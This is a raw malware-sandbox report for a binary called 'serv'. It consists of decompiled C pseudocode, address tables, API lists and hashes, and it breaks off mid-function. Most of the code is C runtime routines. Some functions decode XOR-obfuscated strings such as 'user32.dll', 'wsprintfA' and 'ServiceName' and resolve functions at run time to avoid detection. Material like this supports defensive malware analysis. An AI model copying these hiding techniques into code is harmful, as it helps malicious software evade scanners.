                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427ded
                                                                    0x00000000
                                                                    0x00427ded
                                                                    0x00427ddb
                                                                    0x00427d90

                                                                    APIs
                                                                    • GetStringTypeW.KERNEL32(00000001,00430BB4,00000001,?,00430BB8,0000001C,0042762B,00000001,00000020,00000100,?,00000000), ref: 00427D0F
                                                                    • GetLastError.KERNEL32 ref: 00427D21
                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,00000000,0042788D,00000000,00000000,00430BB8,0000001C,0042762B,00000001,00000020,00000100,?,00000000), ref: 00427D83
                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,00000000,0042788D,?,00000000), ref: 00427E01
                                                                    • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,00000000), ref: 00427E13
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiStringTypeWide$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 3581945363-0
                                                                    • Opcode ID: 36accbf003966c5e43d97efb949ed4729d11f957bd007f7b0b0425a81d0f65ff
                                                                    • Instruction ID: bb06f430a6aecdfc07f9e5044103d3faa1161a53df0707740868c83fed3b13fd
                                                                    • Opcode Fuzzy Hash: 36accbf003966c5e43d97efb949ed4729d11f957bd007f7b0b0425a81d0f65ff
                                                                    • Instruction Fuzzy Hash: 4541E332A04239EBCF219F60EC45AAF7B74FF49B60F51015AF814A6251DB398D11CBAC
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 85%
                                                                    			E00423913(void* __ebx, void* __edi, intOrPtr* __esi, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, char _a24, intOrPtr _a28, intOrPtr _a32) {
                                                                    				char _v5;
                                                                    				signed int _v8;
                                                                    				intOrPtr* _v12;
                                                                    				char _v16;
                                                                    				intOrPtr* _v20;
                                                                    				intOrPtr _v24;
                                                                    				intOrPtr _v28;
                                                                    				intOrPtr _v32;
                                                                    				char _v36;
                                                                    				intOrPtr _v40;
                                                                    				char _v60;
                                                                    				intOrPtr _t87;
                                                                    				void* _t90;
                                                                    				intOrPtr* _t99;
                                                                    				intOrPtr _t100;
                                                                    				void* _t104;
                                                                    				intOrPtr _t106;
                                                                    				void* _t110;
                                                                    				intOrPtr _t111;
                                                                    				intOrPtr _t112;
                                                                    				intOrPtr _t113;
                                                                    				void* _t116;
                                                                    				intOrPtr* _t117;
                                                                    				intOrPtr _t120;
                                                                    				intOrPtr _t127;
                                                                    				intOrPtr _t128;
                                                                    				intOrPtr _t130;
                                                                    				void* _t135;
                                                                    				intOrPtr _t138;
                                                                    				intOrPtr* _t139;
                                                                    				intOrPtr _t141;
                                                                    				intOrPtr _t142;
                                                                    				void* _t147;
                                                                    				void* _t148;
                                                                    				void* _t151;
                                                                    
                                                                    				_t139 = __esi;
                                                                    				_t135 = __edi;
                                                                    				_t116 = __ebx;
                                                                    				_t148 = _t147 - 0x24;
                                                                    				_t87 =  *((intOrPtr*)(_a8 + 8));
                                                                    				_v5 = 0;
                                                                    				_v32 = _t87;
                                                                    				if(_t87 < 0xffffffff) {
                                                                    					L2:
                                                                    					E00423EBB(_t153);
                                                                    				} else {
                                                                    					_t120 = _a20;
                                                                    					_t153 = _t87 -  *((intOrPtr*)(_t120 + 4));
                                                                    					if(_t87 >=  *((intOrPtr*)(_t120 + 4))) {
                                                                    						goto L2;
                                                                    					}
                                                                    				}
                                                                    				_push(_t116);
                                                                    				_t117 = _a4;
                                                                    				_push(_t139);
                                                                    				_push(_t135);
                                                                    				if( *_t117 != 0xe06d7363) {
                                                                    					L40:
                                                                    					__eflags = _a24;
                                                                    					if(_a24 != 0) {
                                                                    						_push(8);
                                                                    						_push(0x430470);
                                                                    						E0042422C(_t117, _t135, _t139);
                                                                    						_t90 = E00423BDF();
                                                                    						__eflags =  *(_t90 + 0x6c);
                                                                    						if( *(_t90 + 0x6c) != 0) {
                                                                    							_v8 = _v8 & 0x00000000;
                                                                    							 *((intOrPtr*)(E00423BDF() + 0x6c))();
                                                                    							_t83 =  &_v8;
                                                                    							 *_t83 = _v8 | 0xffffffff;
                                                                    							__eflags =  *_t83;
                                                                    						}
                                                                    						E00426A34();
                                                                    						E00429729(_t117, _t135, _t139, __eflags);
                                                                    						E0042552E(3);
                                                                    						asm("int3");
                                                                    						_t85 =  &_v60; // 0x423938
                                                                    						 *0x430100( *_t85, 0x16, 0xa);
                                                                    						__eflags = 1;
                                                                    						return 1;
                                                                    					} else {
                                                                    						_t99 = E00423855(_t120, _t117, _a8, _a12, _a16, _a20, _v32, _a28, _a32);
                                                                    						goto L38;
                                                                    					}
                                                                    				} else {
                                                                    					_t135 = 0x19930520;
                                                                    					if( *((intOrPtr*)(_t117 + 0x10)) != 3) {
                                                                    						L18:
                                                                    						if( *_t117 != 0xe06d7363 ||  *((intOrPtr*)(_t117 + 0x10)) != 3) {
                                                                    							goto L40;
                                                                    						} else {
                                                                    							_t100 =  *((intOrPtr*)(_t117 + 0x14));
                                                                    							if(_t100 == _t135 || _t100 == 0x19930521) {
                                                                    								_t141 = _v32;
                                                                    								_t99 = E00422215(_t120, _a20, _a28, _t141,  &_v16,  &_v36);
                                                                    								_t151 = _t148 + 0x14;
                                                                    								_v12 = _t99;
                                                                    								if(_v16 < _v36) {
                                                                    									L25:
                                                                    									while(1) {
                                                                    										if( *_t99 <= _t141 && _t141 <=  *((intOrPtr*)(_t99 + 4))) {
                                                                    											_t127 =  *((intOrPtr*)(_t99 + 0xc));
                                                                    											_t142 =  *((intOrPtr*)(_t99 + 0x10));
                                                                    											_v28 = _t127;
                                                                    											if(_t127 > 0) {
                                                                    												do {
                                                                    													_t128 =  *((intOrPtr*)(_t117 + 0x1c));
                                                                    													_t40 =  *((intOrPtr*)(_t128 + 0xc)) + 4; // 0x4
                                                                    													_t130 =  *((intOrPtr*)( *((intOrPtr*)(_t128 + 0xc))));
                                                                    													_v20 = _t40;
                                                                    													_v24 = _t130;
                                                                    													if(_t130 <= 0) {
                                                                    														goto L32;
                                                                    													} else {
                                                                    														while(1) {
                                                                    															_v40 =  *_v20;
                                                                    															_t104 = E0042330F( *_v20, _t142,  *((intOrPtr*)(_t117 + 0x1c)));
                                                                    															if(_t104 != 0) {
                                                                    																break;
                                                                    															}
                                                                    															_v24 = _v24 - 1;
                                                                    															_v20 = _v20 + 4;
                                                                    															if(_v24 > _t104) {
                                                                    																continue;
                                                                    															} else {
                                                                    																_t99 = _v12;
                                                                    																goto L32;
                                                                    															}
                                                                    															goto L35;
                                                                    														}
                                                                    														_t138 = _v12;
                                                                    														E004237EE(_t142, _v40, _t138, _a8, _t117, _a12, _a16, _a20, _a28, _a32);
                                                                    														_t117 = _a4;
                                                                    														_t151 = _t151 + 0x18;
                                                                    														_t99 = _t138;
                                                                    													}
                                                                    													goto L35;
                                                                    													L32:
                                                                    													_v28 = _v28 - 1;
                                                                    													_t142 = _t142 + 0x10;
                                                                    												} while (_v28 > 0);
                                                                    											}
                                                                    										}
                                                                    										L35:
                                                                    										_v16 = _v16 + 1;
                                                                    										_t99 = _t99 + 0x14;
                                                                    										_v12 = _t99;
                                                                    										if(_v16 < _v36) {
                                                                    											_t141 = _v32;
                                                                    											continue;
                                                                    										}
                                                                    										goto L36;
                                                                    									}
                                                                    								}
                                                                    								L36:
                                                                    								_t179 = _a24;
                                                                    								if(_a24 != 0) {
                                                                    									_push(1);
                                                                    									_push(_t117);
                                                                    									_t99 = E0042344A(_t179);
                                                                    								}
                                                                    								goto L38;
                                                                    							} else {
                                                                    								goto L40;
                                                                    							}
                                                                    						}
                                                                    					} else {
                                                                    						_t106 =  *((intOrPtr*)(_t117 + 0x14));
                                                                    						if(_t106 == 0x19930520 || _t106 == 0x19930521) {
                                                                    							if( *((intOrPtr*)(_t117 + 0x1c)) != 0) {
                                                                    								goto L18;
                                                                    							} else {
                                                                    								_t99 = E00423BDF();
                                                                    								if( *((intOrPtr*)(_t99 + 0x7c)) == 0) {
                                                                    									L38:
                                                                    									return _t99;
                                                                    								} else {
                                                                    									_t139 =  *((intOrPtr*)(E00423BDF() + 0x7c));
                                                                    									_a4 = _t139;
                                                                    									_a12 =  *((intOrPtr*)(E00423BDF() + 0x80));
                                                                    									_v5 = 1;
                                                                    									_t110 = E00427422(_t139, 1);
                                                                    									_t160 = _t110;
                                                                    									_pop(_t120);
                                                                    									if(_t110 == 0) {
                                                                    										E00423EBB(_t160);
                                                                    									}
                                                                    									if( *_t139 != 0xe06d7363) {
                                                                    										_t117 = _a4;
                                                                    										goto L40;
                                                                    									} else {
                                                                    										_t111 = _a4;
                                                                    										if( *((intOrPtr*)(_t111 + 0x10)) == 3) {
                                                                    											_t112 =  *((intOrPtr*)(_t111 + 0x14));
                                                                    											if(_t112 == _t135 || _t112 == 0x19930521) {
                                                                    												_t113 = _a4;
                                                                    												_t165 =  *((intOrPtr*)(_t113 + 0x1c));
                                                                    												if( *((intOrPtr*)(_t113 + 0x1c)) == 0) {
                                                                    													E00423EBB(_t165);
                                                                    												}
                                                                    											}
                                                                    										}
                                                                    										_t117 = _a4;
                                                                    										goto L18;
                                                                    									}
                                                                    								}
                                                                    							}
                                                                    						} else {
                                                                    							goto L18;
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    			}






































                                                                    0x00423913
                                                                    0x00423913
                                                                    0x00423913
                                                                    0x00423916
                                                                    0x0042391c
                                                                    0x00423922
                                                                    0x00423926
                                                                    0x00423929
                                                                    0x00423933
                                                                    0x00423933
                                                                    0x0042392b
                                                                    0x0042392b
                                                                    0x0042392e
                                                                    0x00423931
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00423931
                                                                    0x00423938
                                                                    0x00423939
                                                                    0x00423942
                                                                    0x00423943
                                                                    0x00423944
                                                                    0x00423aec
                                                                    0x00423aec
                                                                    0x00423af0
                                                                    0x00423e86
                                                                    0x00423e88
                                                                    0x00423e8d
                                                                    0x00423e92
                                                                    0x00423e97
                                                                    0x00423e9b
                                                                    0x00423e9d
                                                                    0x00423ea6
                                                                    0x00423eb2
                                                                    0x00423eb2
                                                                    0x00423eb2
                                                                    0x00423eb2
                                                                    0x00427a11
                                                                    0x00427a18
                                                                    0x00427a21
                                                                    0x00427a26
                                                                    0x00427a27
                                                                    0x00427a2b
                                                                    0x00427a33
                                                                    0x00427a34
                                                                    0x00423af2
                                                                    0x00423b08
                                                                    0x00000000
                                                                    0x00423b0d
                                                                    0x0042394a
                                                                    0x0042394e
                                                                    0x00423953
                                                                    0x004239e0
                                                                    0x004239e6
                                                                    0x00000000
                                                                    0x004239f6
                                                                    0x004239f6
                                                                    0x004239fb
                                                                    0x00423a08
                                                                    0x00423a1a
                                                                    0x00423a22
                                                                    0x00423a28
                                                                    0x00423a2b
                                                                    0x00000000
                                                                    0x00423a36
                                                                    0x00423a38
                                                                    0x00423a43
                                                                    0x00423a48
                                                                    0x00423a4b
                                                                    0x00423a4e
                                                                    0x00423a50
                                                                    0x00423a50
                                                                    0x00423a56
                                                                    0x00423a59
                                                                    0x00423a5d
                                                                    0x00423a60
                                                                    0x00423a63
                                                                    0x00000000
                                                                    0x00423a65
                                                                    0x00423a65
                                                                    0x00423a6d
                                                                    0x00423a70
                                                                    0x00423a78
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00423a7a
                                                                    0x00423a7d
                                                                    0x00423a84
                                                                    0x00000000
                                                                    0x00423a86
                                                                    0x00423a86
                                                                    0x00000000
                                                                    0x00423a86
                                                                    0x00000000
                                                                    0x00423a84
                                                                    0x00423a9a
                                                                    0x00423ab2
                                                                    0x00423ab7
                                                                    0x00423aba
                                                                    0x00423abd
                                                                    0x00423abd
                                                                    0x00000000
                                                                    0x00423a89
                                                                    0x00423a89
                                                                    0x00423a8c
                                                                    0x00423a8f
                                                                    0x00423a95
                                                                    0x00423a4e
                                                                    0x00423abf
                                                                    0x00423abf
                                                                    0x00423ac5
                                                                    0x00423acb
                                                                    0x00423ace
                                                                    0x00423a33
                                                                    0x00000000
                                                                    0x00423a33
                                                                    0x00000000
                                                                    0x00423ace
                                                                    0x00423a36
                                                                    0x00423ad4
                                                                    0x00423ad4
                                                                    0x00423ad8
                                                                    0x00423ada
                                                                    0x00423adc
                                                                    0x00423add
                                                                    0x00423ae3
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004239fb
                                                                    0x00423959
                                                                    0x00423959
                                                                    0x0042395e
                                                                    0x0042396b
                                                                    0x00000000
                                                                    0x0042396d
                                                                    0x0042396d
                                                                    0x00423976
                                                                    0x00423ae4
                                                                    0x00423ae8
                                                                    0x0042397c
                                                                    0x00423981
                                                                    0x00423984
                                                                    0x00423995
                                                                    0x00423998
                                                                    0x0042399c
                                                                    0x004239a1
                                                                    0x004239a4
                                                                    0x004239a5
                                                                    0x004239a7
                                                                    0x004239a7
                                                                    0x004239b2
                                                                    0x00423ae9
                                                                    0x00000000
                                                                    0x004239b8
                                                                    0x004239b8
                                                                    0x004239bf
                                                                    0x004239c1
                                                                    0x004239c6
                                                                    0x004239cf
                                                                    0x004239d2
                                                                    0x004239d6
                                                                    0x004239d8
                                                                    0x004239d8
                                                                    0x004239d6
                                                                    0x004239c6
                                                                    0x004239dd
                                                                    0x00000000
                                                                    0x004239dd
                                                                    0x004239b2
                                                                    0x00423976
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0042395e
                                                                    0x00423953

                                                                    APIs
                                                                      • Part of subcall function 004237EE: _UnwindNestedFrames.LIBCMT ref: 00423811
                                                                    • RtlInitializeCriticalSection.NTDLL(89B), ref: 00427A2B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalFramesInitializeNestedSectionUnwind
                                                                    • String ID: 89B$csm$csm$csm
                                                                    • API String ID: 2222982843-295775647
                                                                    • Opcode ID: 4a6247d3efb09e660be9013e9ce08dd993c837138d6a87129f5f50171d983c3a
                                                                    • Instruction ID: b223c0e9202b9b58b7789bccb516841bed345c4c5a4c3ac399afd32fc213f5ba
                                                                    • Opcode Fuzzy Hash: 4a6247d3efb09e660be9013e9ce08dd993c837138d6a87129f5f50171d983c3a
                                                                    • Instruction Fuzzy Hash: CB719031A002299FCF11DF95E441A9E7BB5BF04316F9440ABE840AB252C77DDE51CB99
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00561D92() {
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				char _v16;
                                                                    				struct HINSTANCE__* _t32;
                                                                    				void* _t35;
                                                                    				void* _t37;
                                                                    
                                                                    				_t32 =  *0x56324c; // 0x775c0000
                                                                    				if(_t32 == 0) {
                                                                    					_v16 = 0x52;
                                                                    					_v15 = 0x54;
                                                                    					_v14 = 0x42;
                                                                    					_v13 = 0x55;
                                                                    					_v12 = 0x14;
                                                                    					_v11 = 0x15;
                                                                    					_v10 = 9;
                                                                    					_v9 = 0x43;
                                                                    					_v8 = 0x4b;
                                                                    					_v7 = 0x4b;
                                                                    					_v6 = 0x27;
                                                                    					do {
                                                                    						 *(_t37 + _t32 - 0xc) =  *(_t37 + _t32 - 0xc) ^ 0x00000027;
                                                                    						_t32 =  &(_t32->i);
                                                                    					} while (_t32 < 0xb);
                                                                    					_t32 = LoadLibraryA( &_v16);
                                                                    					 *0x56324c = _t32;
                                                                    				}
                                                                    				if( *0x5634d8 == 0) {
                                                                    					_v16 = 0x4f;
                                                                    					_v15 = 0x4b;
                                                                    					_v14 = 0x48;
                                                                    					_v13 = 0x4a;
                                                                    					_v12 = 0x51;
                                                                    					_v11 = 0x56;
                                                                    					_v10 = 0x4c;
                                                                    					_v9 = 0x5e;
                                                                    					_v8 = 0x79;
                                                                    					_v7 = 0x38;
                                                                    					_t35 = 0;
                                                                    					do {
                                                                    						 *(_t37 + _t35 - 0xc) =  *(_t37 + _t35 - 0xc) ^ 0x00000038;
                                                                    						_t35 = _t35 + 1;
                                                                    					} while (_t35 < 0xa);
                                                                    					_t31 =  &_v16; // 0x38
                                                                    					_t32 = GetProcAddress(_t32, _t31);
                                                                    					 *0x5634d8 = _t32;
                                                                    					if(_t32 == 0 &&  *0x563248 != _t32) {
                                                                    						return E00561AAA(1);
                                                                    					}
                                                                    				}
                                                                    				return _t32;
                                                                    			}

















                                                                    0x00561d98
                                                                    0x00561d9f
                                                                    0x00561da1
                                                                    0x00561da5
                                                                    0x00561da9
                                                                    0x00561dad
                                                                    0x00561db1
                                                                    0x00561db5
                                                                    0x00561db9
                                                                    0x00561dbd
                                                                    0x00561dc1
                                                                    0x00561dc5
                                                                    0x00561dc9
                                                                    0x00561dcd
                                                                    0x00561dcd
                                                                    0x00561dd2
                                                                    0x00561dd3
                                                                    0x00561ddc
                                                                    0x00561de2
                                                                    0x00561de2
                                                                    0x00561dee
                                                                    0x00561df0
                                                                    0x00561df4
                                                                    0x00561df8
                                                                    0x00561dfc
                                                                    0x00561e00
                                                                    0x00561e04
                                                                    0x00561e08
                                                                    0x00561e0c
                                                                    0x00561e10
                                                                    0x00561e14
                                                                    0x00561e18
                                                                    0x00561e1a
                                                                    0x00561e1a
                                                                    0x00561e1f
                                                                    0x00561e20
                                                                    0x00561e25
                                                                    0x00561e2a
                                                                    0x00561e32
                                                                    0x00561e37
                                                                    0x00000000
                                                                    0x00561e43
                                                                    0x00561e37
                                                                    0x00561e49

                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(00000027), ref: 00561DDC
                                                                    • GetProcAddress.KERNEL32(775C0000,8KHJQVL^y8), ref: 00561E2A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614225956.0000000000561000.00000020.00000001.01000000.00000008.sdmp, Offset: 00560000, based on PE: true
                                                                    • Associated: 00000002.00000002.614209974.0000000000560000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614242281.0000000000563000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614256717.0000000000564000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_560000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: '$8KHJQVL^y8$8KHJQVL^y8'
                                                                    • API String ID: 2574300362-2479241950
                                                                    • Opcode ID: d298681aec9f09fbabd32ba074dd38965942111b678b02b051b4f2e17d77a001
                                                                    • Instruction ID: a746f2c0dced05639fe0fc93622b83fef70a954575e21e1f605b02f0cff54fa8
                                                                    • Opcode Fuzzy Hash: d298681aec9f09fbabd32ba074dd38965942111b678b02b051b4f2e17d77a001
                                                                    • Instruction Fuzzy Hash: 21210E60D086C8EDEB02C7B8D44C79DBFA55B22309F1880D8C595AB292D7FE474CD76A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 62%
                                                                    			E00427A37(void* __eflags) {
                                                                    				_Unknown_base(*)()* _t9;
                                                                    				struct HINSTANCE__* _t12;
                                                                    				void* _t13;
                                                                    				void* _t14;
                                                                    				void* _t15;
                                                                    				void* _t16;
                                                                    
                                                                    				_push(0x10);
                                                                    				_push(0x430ba8);
                                                                    				E0042422C(_t13, _t14, _t15);
                                                                    				_t9 =  *0x4483d4;
                                                                    				if(_t9 == 0) {
                                                                    					if( *0x448268 == 1) {
                                                                    						L4:
                                                                    						_t9 = 0x427a27;
                                                                    						 *0x4483d4 = 0x427a27;
                                                                    					} else {
                                                                    						_t12 = GetModuleHandleA("kernel32.dll");
                                                                    						if(_t12 == 0) {
                                                                    							goto L4;
                                                                    						} else {
                                                                    							_t9 = GetProcAddress(_t12, "InitializeCriticalSectionAndSpinCount");
                                                                    							 *0x4483d4 = _t9;
                                                                    							if(_t9 == 0) {
                                                                    								goto L4;
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				 *(_t16 - 4) =  *(_t16 - 4) & 0x00000000;
                                                                    				 *((intOrPtr*)(_t16 - 0x20)) =  *_t9( *((intOrPtr*)(_t16 + 8)),  *((intOrPtr*)(_t16 + 0xc)));
                                                                    				 *(_t16 - 4) =  *(_t16 - 4) | 0xffffffff;
                                                                    				return E00424267(_t10);
                                                                    			}









                                                                    0x00427a37
                                                                    0x00427a39
                                                                    0x00427a3e
                                                                    0x00427a43
                                                                    0x00427a4a
                                                                    0x00427a53
                                                                    0x00427a79
                                                                    0x00427a79
                                                                    0x00427a7e
                                                                    0x00427a55
                                                                    0x00427a5a
                                                                    0x00427a62
                                                                    0x00000000
                                                                    0x00427a64
                                                                    0x00427a6a
                                                                    0x00427a70
                                                                    0x00427a77
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427a77
                                                                    0x00427a62
                                                                    0x00427a53
                                                                    0x00427a83
                                                                    0x00427a8f
                                                                    0x00427ab8
                                                                    0x00427ac1

                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,00430BA8,00000010,004240D3,00000000,00000FA0,74714DE0,00000000,00423D9C,00422D4F,?,004303A8,00000060), ref: 00427A5A
                                                                    • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionAndSpinCount), ref: 00427A6A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll$Mqt`7utIqt
                                                                    • API String ID: 1646373207-30289905
                                                                    • Opcode ID: db6120c87f9cf45bba0d6a62e57982895b74eb97ac7cc83f7448c96e82f6eab6
                                                                    • Instruction ID: 812ec9f115db8489c34653d962ab2dde815ca2b0a5fd48a61a1b64af0678f44a
                                                                    • Opcode Fuzzy Hash: db6120c87f9cf45bba0d6a62e57982895b74eb97ac7cc83f7448c96e82f6eab6
                                                                    • Instruction Fuzzy Hash: D8F09A34708212ABCB109FA5BC0575E3AB0AB48768FA0526EA900D12A0DBBC8B00DB1C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 97%
                                                                    			E0042A851(void* __ecx, char* _a4, intOrPtr _a8) {
                                                                    				signed int _v8;
                                                                    				char _v12;
                                                                    				char _v16;
                                                                    				void* _v20;
                                                                    				void* _v24;
                                                                    				char _v25;
                                                                    				char _v26;
                                                                    				char _v27;
                                                                    				char _v28;
                                                                    				char _v29;
                                                                    				char _v30;
                                                                    				char _v31;
                                                                    				char _v32;
                                                                    				char _v33;
                                                                    				char _v34;
                                                                    				char _v35;
                                                                    				char _v36;
                                                                    				char _v37;
                                                                    				char _v38;
                                                                    				char _v39;
                                                                    				char _v40;
                                                                    				char _v41;
                                                                    				char _v42;
                                                                    				char _v43;
                                                                    				char _v44;
                                                                    				char _v47;
                                                                    				char _v48;
                                                                    				char _v49;
                                                                    				char _v50;
                                                                    				char _v51;
                                                                    				char _v52;
                                                                    				char _v53;
                                                                    				char _v54;
                                                                    				char _v55;
                                                                    				char _v56;
                                                                    				char _v57;
                                                                    				char _v58;
                                                                    				char _v59;
                                                                    				char _v60;
                                                                    				char _v61;
                                                                    				char _v62;
                                                                    				char _v63;
                                                                    				char _v64;
                                                                    				char _v65;
                                                                    				char _v66;
                                                                    				char _v67;
                                                                    				char _v68;
                                                                    				char _v69;
                                                                    				char _v70;
                                                                    				char _v71;
                                                                    				char _v72;
                                                                    				char _v73;
                                                                    				char _v74;
                                                                    				char _v75;
                                                                    				char _v76;
                                                                    				char _v77;
                                                                    				char _v78;
                                                                    				char _v79;
                                                                    				char _v80;
                                                                    				char _v81;
                                                                    				char _v82;
                                                                    				char _v83;
                                                                    				char _v84;
                                                                    				char _v85;
                                                                    				char _v86;
                                                                    				char _v87;
                                                                    				char _v88;
                                                                    				char _v89;
                                                                    				char _v90;
                                                                    				char _v91;
                                                                    				char _v92;
                                                                    				char _v93;
                                                                    				char _v94;
                                                                    				char _v95;
                                                                    				char _v96;
                                                                    				char _v97;
                                                                    				char _v98;
                                                                    				char _v99;
                                                                    				char _v100;
                                                                    				char _v101;
                                                                    				char _v102;
                                                                    				char _v103;
                                                                    				char _v104;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				void* _t143;
                                                                    				void* _t144;
                                                                    				void* _t147;
                                                                    				void* _t159;
                                                                    				void* _t160;
                                                                    				void* _t167;
                                                                    				signed int _t180;
                                                                    				signed int _t181;
                                                                    				signed int _t182;
                                                                    				signed short _t184;
                                                                    				signed int _t185;
                                                                    				signed int _t186;
                                                                    				signed int _t187;
                                                                    				void* _t189;
                                                                    				void* _t195;
                                                                    				CHAR* _t207;
                                                                    				void* _t213;
                                                                    
                                                                    				_t189 = __ecx;
                                                                    				_v44 = 0x86;
                                                                    				_v43 = 0xb0;
                                                                    				_v42 = 0xa7;
                                                                    				_v41 = 0xa3;
                                                                    				_v40 = 0xbc;
                                                                    				_v39 = 0xb6;
                                                                    				_v38 = 0xb0;
                                                                    				_v37 = 0x9b;
                                                                    				_v36 = 0xb4;
                                                                    				_v35 = 0xb8;
                                                                    				_v34 = 0xb0;
                                                                    				_v33 = 0xd5;
                                                                    				_t143 = 0;
                                                                    				do {
                                                                    					 *(_t213 + _t143 - 0x28) =  *(_t213 + _t143 - 0x28) ^ 0x000000d5;
                                                                    					_t143 = _t143 + 1;
                                                                    				} while (_t143 < 0xc);
                                                                    				_v104 = 0xd;
                                                                    				_v103 = 0x31;
                                                                    				_v102 = 0x38;
                                                                    				_v101 = 0x2a;
                                                                    				_v100 = 0x29;
                                                                    				_v99 = 0x3f;
                                                                    				_v98 = 0x2c;
                                                                    				_v97 = 0x3b;
                                                                    				_v96 = 2;
                                                                    				_v95 = 0x13;
                                                                    				_v94 = 0x37;
                                                                    				_v93 = 0x3d;
                                                                    				_v92 = 0x2c;
                                                                    				_v91 = 0x31;
                                                                    				_v90 = 0x2d;
                                                                    				_v89 = 0x31;
                                                                    				_v88 = 0x38;
                                                                    				_v87 = 0x2a;
                                                                    				_v86 = 2;
                                                                    				_v85 = 9;
                                                                    				_v84 = 0x37;
                                                                    				_v83 = 0x30;
                                                                    				_v82 = 0x3a;
                                                                    				_v81 = 0x31;
                                                                    				_v80 = 0x29;
                                                                    				_v79 = 0x2d;
                                                                    				_v78 = 0x7e;
                                                                    				_v77 = 0x10;
                                                                    				_v76 = 0xa;
                                                                    				_v75 = 2;
                                                                    				_v74 = 0x1d;
                                                                    				_v73 = 0x2b;
